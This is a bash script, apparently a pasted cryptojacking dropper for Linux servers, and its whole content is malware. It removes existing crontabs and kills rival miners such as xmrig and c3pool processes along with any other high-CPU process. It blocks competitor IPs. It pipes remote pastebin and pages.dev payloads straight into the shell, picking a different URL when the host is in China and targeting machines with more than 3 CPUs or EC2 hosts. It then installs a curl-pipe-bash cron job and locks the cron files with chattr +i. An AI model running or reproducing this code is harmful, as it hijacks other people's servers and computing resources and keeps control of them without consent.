1. #!/bin/bash
  2.  
  3. for file in /etc/cron.d/$(whoami) /etc/cron.d/apache /var/spool/cron/$(whoami) /var/spool/cron/crontabs/$(whoami) /etc/cron.hourly/oanacroner1; do
  4.     if [ -f "$file" ]; then
  5.         chattr -i -a "$file"
  6.     fi
  7. done
  8. CUSTOM_ARG="${1:-x}"
  9. crontab -r
  10. iptables -A INPUT -s 66.23.199.44 -j DROP
  11. iptables -A INPUT -s 45.94.31.89 -j DROP
  12. ip route add blackhole 139.59.59.33 || true
  13. ip route add blackhole 142.132.131.238 || true 
  14. kill_and_remove_process "kryptex.network" || true
  15. ip route add blackhole 45.94.31.89 || true
  16. rm -rf /bin/softirq || true
  17. rm -rf /lib/systemd/cache/health-monitor || true
  18. mkdir -p /bin/softirq || true
  19. rm -rf /tmp/nuclear || true
  20. mkdir -p /tmp/nuclear || true
  21.  
  22. ip route add blackhole 154.89.152.115 || true
  23. rm -rf /tmp/runnv/* || true
  24. mkdir -p /tmp/runnv/lived.sh || true
  25. mkdir -p /tmp/runnv/alive.sh || true
  26. mkdir -p /bin/softirq || true
  27. rm -rf /usr/local/bin/watcher || true
  28. mkdir -p /usr/local/bin/watcher || true
  29. nohup sh -c "{ wget -qO- https://pastebin.com/raw/2jtsz9Tk || curl -sSLk https://pastebin.com/raw/2jtsz9Tk; } | tr -d '\r' | sh" >/dev/null 2>&1 &
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36. kill_and_remove_process() {
  37.     local term="$1"
  38.     if [ -z "$term" ]; then
  39.         echo "term not provided."
  40.         return 2
  41.     fi
  42.  
  43.     local pids
  44.     pids=$(ps -eo pid,args | grep "$term" | grep -v grep | awk '{print $1}')
  45.  
  46.     if [ -z "$pids" ]; then
  47.         return 1
  48.     fi
  49.  
  50.     for pid in $pids; do
  51.         local exe_path
  52.         exe_path=$(readlink -f "/proc/$pid/exe" 2>/dev/null)
  53.  
  54.         if [ -z "$exe_path" ]; then
  55.             echo "Skipping PID $pid"
  56.             continue
  57.         fi
  58.  
  59.         # SAFETY CHECK: Exclude common system binary paths
  60.         case "$exe_path" in
  61.             /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*)
  62.                 echo "Skipping system binary for PID $pid at: $exe_path"
  63.                 continue # Move to the next PID
  64.                 ;;
  65.         esac
  66.  
  67.         # If the checks pass, proceed with termination and deletion
  68.         echo "Terminating non-system process '$term' with PID: $pid"
  69.         kill -9 "$pid"
  70.  
  71.         if [ -f "$exe_path" ]; then
  72.             echo "Deleting executable: $exe_path"
  73.             rm -f "$exe_path"
  74.             if [ $? -eq 0 ]; then
  75.                 echo "Executable successfully deleted."
  76.             else
  77.                 echo "Error: Failed to delete executable. Check permissions."
  78.             fi
  79.         else
  80.             echo "Executable for PID $pid not found for deletion (already removed or inaccessible)."
  81.         fi
  82.     done
  83.  
  84.     return 0
  85. }
  86.  
  87. kill_and_remove_process ".rsyslogd" || true
  88. kill_and_remove_process "crazyeltonproxy" || true
  89. kill_and_remove_process "xmrig" || true
  90. kill_and_remove_process "monero" || true 
  91. kill_and_remove_process "c3pool.org:80" || true
  92. kill_and_remove_process "/bin/watcher" || true  
  93. kill_and_remove_process "45.94.31.89" || true
  94. kill_and_remove_process "hosts-to-ignore" || true
  95. kill_and_remove_process "supportxmr" || true
  96. kill_and_remove_process "youyutebuae.xyz" || true
  97. kill_and_remove_process "nuclear" || true
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104. for pid in $(pgrep -f 'bash /tmp/.*\.sh'); do
  105.     if [ "$pid" != "$$" ] && [ "$pid" != "$PPID" ]; then
  106.         kill -9 "$pid" 2>/dev/null && echo "Killed process $pid"
  107.     fi
  108. done
  109.  
  110.  
  111.  
  112. if [ "$(id -u)" -eq 0 ]; then
  113.     echo "Stopping systemd_s service..."
  114.     systemctl stop systemd_s
  115. fi
  116.  
  117. check_system_specs() {
  118.     local cpu_count=$(nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null || echo 1)
  119.     local is_root=false
  120.     if [[ $EUID -eq 0 ]]; then
  121.         is_root=true
  122.     fi
  123.  
  124.     if [[ $cpu_count -gt 8 && "$is_root" == "true" ]]; then
  125.         echo "VERY GOOD BOY!"
  126.     fi
  127. }
  128.  
  129. # Call the function
  130. check_system_specs
  131.  
  132. kill_high_cpu_processes() {
  133.     local threshold=150.0
  134.     local exclude_patterns=("reservepattern23333" "goAwgBCFH") 
  135.     local pid cpu cmdline
  136.  
  137.     ps -eo pid,%cpu --sort=-%cpu | awk -v threshold="$threshold" \
  138.         'NR>1 && $2 > threshold {print $1}' | while read -r pid; do
  139.  
  140.         # Read full command line (even if truncated in `ps`)
  141.         if [ -f "/proc/$pid/cmdline" ]; then
  142.             cmdline=$(tr '\0' ' ' < "/proc/$pid/cmdline")
  143.         else
  144.             echo "PID $pid died before inspection"
  145.             continue
  146.         fi
  147.  
  148.         # Check for exclusion patterns in full cmdline
  149.         for pattern in "${exclude_patterns[@]}"; do
  150.             if [[ "$cmdline" == *"$pattern"* ]]; then
  151.                 echo "Excluding PID $pid (matched '$pattern')"
  152.                 continue 2
  153.             fi
  154.         done
  155.  
  156.         if kill -9 "$pid" 2>/dev/null; then
  157.             echo "Killed PID $pid (CPU: $(ps -p "$pid" -o %cpu --no-headers)%)"
  158.         else
  159.             echo "Failed to kill PID $pid (already dead or permission denied)"
  160.         fi
  161.     done
  162. }
  163.  
  164. kill_high_cpu_processes
  165.  
  166. is_program_running() {
  167.     found=0
  168.     for proc_dir in /proc/[0-9]*; do
  169.         if [ -d "$proc_dir" ]; then
  170.             pid=$(basename "$proc_dir")
  171.  
  172.             if [ -r "$proc_dir/cmdline" ]; then
  173.                 cmdline=$(cat "$proc_dir/cmdline" 2>/dev/null | tr '\0' ' ')
  174.  
  175.                 if echo "$cmdline" | grep -q "goAwgBCFH" && \
  176.                    ! echo "$cmdline" | grep -q "is_program_running"; then
  177.  
  178.                     if [ -r "$proc_dir/stat" ]; then
  179.                         state=$(awk '{print $3}' "$proc_dir/stat" 2>/dev/null)
  180.                         if [ "$state" != "Z" ]; then
  181.                             found=1
  182.                             break
  183.                         fi
  184.                     fi
  185.                 fi
  186.             fi
  187.         fi
  188.     done
  189.  
  190.     if [ $found -eq 1 ]; then
  191.         echo "Program is running."
  192.         return 0
  193.     else
  194.         echo "Program is not running."
  195.         return 1
  196.     fi
  197. }
  198.  
  199.  
  200.  
  201.  
  202.  
  203.  
  204. download_and_execute() {
  205.     local primary_url="https://redirect-master-pages.pages.dev/run";
  206.     local china_url="https://redirect-master-pages.pages.dev/runCN";
  207.     local output_file="run.sh"
  208.  
  209.     local is_in_china=false
  210.     if command -v curl &> /dev/null; then
  211.         if curl -s --connect-timeout 3 -4 http://ip-api.com/json/ | grep -q '"country":"China"'; then
  212.             is_in_china=true
  213.         fi
  214.     elif command -v wget &> /dev/null; then
  215.         if wget -qO- --timeout=3 -4 http://ip-api.com/json/ | grep -q '"country":"China"'; then
  216.             is_in_china=true
  217.         fi
  218.     fi
  219.  
  220.     # Select appropriate URL
  221.     local download_url="$primary_url"
  222.     if [ "$is_in_china" = true ]; then
  223.         download_url="$china_url"
  224.     fi
  225.  
  226.     # Download the script
  227.     if command -v wget &> /dev/null; then
  228.         wget -qO "$output_file" "$download_url"
  229.     elif command -v curl &> /dev/null; then
  230.         curl -k -o "$output_file" "$download_url"
  231.     else
  232.         echo "Error: Neither wget nor curl is available. Please install one of them."
  233.         exit 1
  234.     fi
  235.  
  236.     # Execute if download succeeded
  237.     if [[ -f "$output_file" ]]; then
  238.         chmod +x "$output_file"
  239.         sed -i 's/\r$//' "$output_file"
  240.        bash ./"$output_file" "$CUSTOM_ARG"
  241.         rm -f "$output_file"
  242.     else
  243.         echo "Error: Failed to download the script from $download_url"
  244.         exit 1
  245.     fi
  246. }
  247.  
  248. get_cpu_count() {
  249.     # Try different methods to get CPU count
  250.     if [ -f "/proc/cpuinfo" ]; then
  251.         grep -c ^processor /proc/cpuinfo
  252.     else
  253.         sysctl -n hw.ncpu 2>/dev/null || nproc 2>/dev/null || getconf _NPROCESSORS_ONLN 2>/dev/null || echo 1
  254.     fi
  255. }
  256.  
  257. is_ec2_host() {
  258.     # Check if hostname contains "ec2" (case insensitive)
  259.     hostname | grep -qi -e "ec2" -e "compute"
  260.     return $?
  261. }
  262.  
  263. # Main logic
  264. if ! is_program_running; then
  265.     cpu_count=$(get_cpu_count)
  266.     if [ "$cpu_count" -gt 3 ] || is_ec2_host; then
  267.         download_and_execute
  268.     else
  269.         echo "LOW CPU: System has only $cpu_count CPUs (minimum 4 required) and is not an EC2 instance"
  270.     fi
  271. fi
  272. create_cronjob() {
  273.     local cron_command
  274.     if command -v curl >/dev/null; then
  275.         cron_command="/bin/sh -c 'curl -fsSLk $1 | tr -d '\''\r'\'' | bash'"
  276.     elif command -v wget >/dev/null; then
  277.         cron_command="/bin/sh -c 'wget -qO- $1 | tr -d '\''\r'\'' | bash'"
  278.     else
  279.         log "Error: Cannot create cron job, neither curl nor wget is available."
  280.         return 1
  281.     fi
  282.  
  283.     (crontab -l 2>/dev/null | grep -vF "$1"; echo "*/75 * * * * $cron_command") | crontab -
  284.     log "Cron job successfully configured."
  285. }
  286.  
  287. create_cronjob "https://redirect-master-pages.pages.dev/mon";
  288.  
  289. for file in /etc/cron.d/$(whoami) /etc/cron.d/apache /var/spool/cron/$(whoami) /var/spool/cron/crontabs/$(whoami) /etc/cron.hourly/oanacroner1 /etc/init.d/down; do
  290.     if [ -f "$file" ]; then
  291.         chattr +i "$file"
  292.         chattr +a "$file"
  293.     fi
  294. done